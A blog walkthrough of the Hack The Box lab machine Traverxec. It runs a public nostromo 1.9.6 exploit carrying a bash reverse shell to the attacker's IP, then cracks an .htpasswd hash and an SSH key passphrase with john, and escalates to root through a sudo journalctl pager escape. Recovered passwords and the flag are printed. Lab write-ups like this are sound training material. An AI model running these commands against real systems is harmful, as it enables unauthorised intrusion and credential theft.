traverxec Writeup

Por /

🌐 Environment

Element Details
IP address 10.10.10.165
Operating System Debian GNU/Linux 10 (buster
User/Group user / www-data
Network VLAN-10 / NAT / Host-only

🧪 Procedure

We check connection with the victim machine.

ping -c2 10.10.10.165
PING 10.10.10.165 (10.10.10.165) 56(84) bytes of data.
64 bytes from 10.10.10.165: icmp_seq=1 ttl=63 time=90.1 ms
64 bytes from 10.10.10.165: icmp_seq=2 ttl=63 time=89.9 ms

--- 10.10.10.165 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 89.927/90.025/90.123/0.098 ms

Now we look at the TTL to see if we are looking at a Windows or Linux machine and we see that it is 63, that is, a Linux machine.

To keep everything organized, the first thing we always do is create a folder in your work environment with the name of the machine.
Once you have created it, go to the folder and run the command [[mkt]]

1️⃣ Enumeration

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.165 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-22 23:07 BST
Initiating SYN Stealth Scan at 23:07
Scanning 10.10.10.165 [65535 ports]
Discovered open port 80/tcp on 10.10.10.165
Discovered open port 22/tcp on 10.10.10.165
Completed SYN Stealth Scan at 23:07, 26.39s elapsed (65535 total ports)
Nmap scan report for 10.10.10.165
Host is up, received user-set (0.089s latency).
Scanned at 2025-06-22 23:07:30 BST for 26s
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.45 seconds
           Raw packets sent: 131087 (5.768MB) | Rcvd: 21 (924B)

Una vez lo tengamos vamos a extraer todos los puertos ejecutando el comando [[extactPorts]].

Una vez tengamos los puertos ejecutamos 

 nmap -p22,80 -sCV 10.10.10.165 -oN targered
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-22 23:08 BST
Nmap scan report for 10.10.10.165
Host is up (0.089s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.21 seconds

While we see that we have a whatweb on port 80.

whatweb http://10.10.10.165
http://10.10.10.165 [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[nostromo 1.9.6], IP[10.10.10.165], JQuery, Script, Title[TRAVERXEC]

We have a CVE for nostromo 1.9.6
We download this simple script https://www.exploit-db.com/exploits/47837

#We execute the script
ython2 CVE-2019-16278.py 10.10.10.165 80 'bash -c "bash -i >&/dev/tcp/10.10.14.22/443 0>&1"' 


_____-2019-16278 
_____ _______ ______ _____\ \ 
_____\ \_\ | | | / / | | 
/ /| || / / /|/ / /___/| 
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/| 
\|_____| || \|_____|/ \|____| | | 
|____|/ |___|/

#We get the shell
nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.165] 34972
bash: cannot set terminal process group (534): Inappropriate ioctl for device
Bash: no job control in this shell
www-data@traverxec:/usr/bin$ whoami
whoami
www-data
www-data@traverxec:/usr/bin$

TTY treatment.

script /dev/null -c bash
control z
stty raw -echo; fg
reset xterm
export TERM=xterm
stty rows 55 columns 236

Now after doing the first checks with sudo -l , SUID files, etc., since this is the first time I’ve seen this server, I’m going to look for index files to see if I can find the web application file.

find / -type f -name "index.*" 2>/dev/null
/usr/share/doc/python3/python-policy.html/index.html
/usr/share/doc/shared-mime-info/shared-mime-info-spec.html/index.html
/usr/share/doc/debian/FAQ/index.en.html
/usr/share/doc/adduser/examples/adduser.local.conf.examples/skel.other/index.html
/var/nostromo/htdocs/index.html
/var/cache/man/index.db
/var/cache/man/nl/index.db
/var/cache/man/pt_BR/index.db
/var/cache/man/ru/index.db
/var/cache/man/zh_CN/index.db
/var/cache/man/de/index.db
/var/cache/man/id/index.db
/var/cache/man/sv/index.db
/var/cache/man/zh_TW/index.db
/var/cache/man/ko/index.db
/var/cache/man/da/index.db

We see the application path here /var/nostromo/htdocs/index.html let’s see what we find there.
In the conf directory we see the following.

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]

servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html

# LOGS [OPTIONAL]

logpid logs/nhttpd.pid

# SETUID [RECOMMENDED]

user www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs /home
homedirs_public public_www
www-data@traverxec:/var/nostromo/conf$ 

#we see what it contains
cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Let’s crack it by brute force.

echo 'david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/' > htpasswd.hash
john --wordlist=/usr/share/wordlists/rockyou.txt htpasswd.hash
john --show htpasswd.hash

We have found Nowonly4me
The issue is that it does not allow us to move to the user David with this password.
We have seen the public_www directory that must be in /home/david

www-data@traverxec:/etc/ssh$ ls -la /home/david/public_www
total 16
drwxr-xr-x 3 david david 4096 Oct 25  2019 .
drwx--x--x 5 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david  402 Oct 25  2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25  2019 protected-file-area

www-data@traverxec:/etc/ssh$ ls -la /home/david/public_www/protected-file-area
total 16
drwxr-xr-x 2 david david 4096 Oct 25  2019 .
drwxr-xr-x 3 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david  45 Oct 25  2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz

We have read permissions for what appears to be an ssh key. We are going to copy it to /tmp

www-data@traverxec:/etc/ssh$ cp /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz /tmp

www-data@traverxec:/tmp$ tar -xvzf backup-ssh-identity-files.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
www-data@traverxec:/tmp$

We copy the rsa_id to our attacking host and give it permissions 600.

ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa':

We are going to crack the rsa_id since the password will not work Nowonly4me

└─# locate ssh2john.py
/usr/share/john/ssh2john.py

┌──(root㉿jprhack)-[/home/jesushack/Hacking/hatthebox/ease/linux/traverxec/exploits]
└─# python2 /usr/share/john/ssh2john.py id_rsa > hash

┌──(root㉿jprhack)-[/home/jesushack/Hacking/hatthebox/ease/linux/traverxec/exploits]
└─# john -w:/usr/share/wordlists/rockyou.txt hash

We have discovered the password hunter

david@traverxec:~$ cat user.txt
c17612caad852f820df64a8ea0e376e4

We see a script in the /home/david/bin directory called server-stats.sh
If we see what it contains

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

Apriori runs all the commands with absolute paths but it is using sudo to run /usr/bin/journalctl
IF we go to https://gtfobins.github.io/gtfobins/journalctl/ we see that we can launch a console with privileges.
Watch out!! I’ve resized my window to make it very small so it can go into pagination mode and insert the command.
Now I run

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2025-06-22 17:59:53 EDT, end at Mo
Jun 23 07:58:13 traverxec crontab[1155]: (www-data) LIS
Jun 23 08:19:27 traverxec su[1199]: pam_unix(su:auth):
Jun 23 08:19:29 traverxec su[1199]: FAILED SU (to david
Jun 23 08:19:59 traverxec su[1200]: pam_unix(su:auth):
Jun 23 08:20:01 traverxec su[1200]: FAILED SU (to david
!/bin/bash
root@traverxec:/home/david/bin#

Leave a Comment

Your email address will not be published. Required fields are marked *

Copyright © 2025 JPRHACK | Contact

Some content on this blog is inspired by challenges from platforms like Hack The Box. All explanations are written originally for educational and personal learning purposes.

Scroll to Top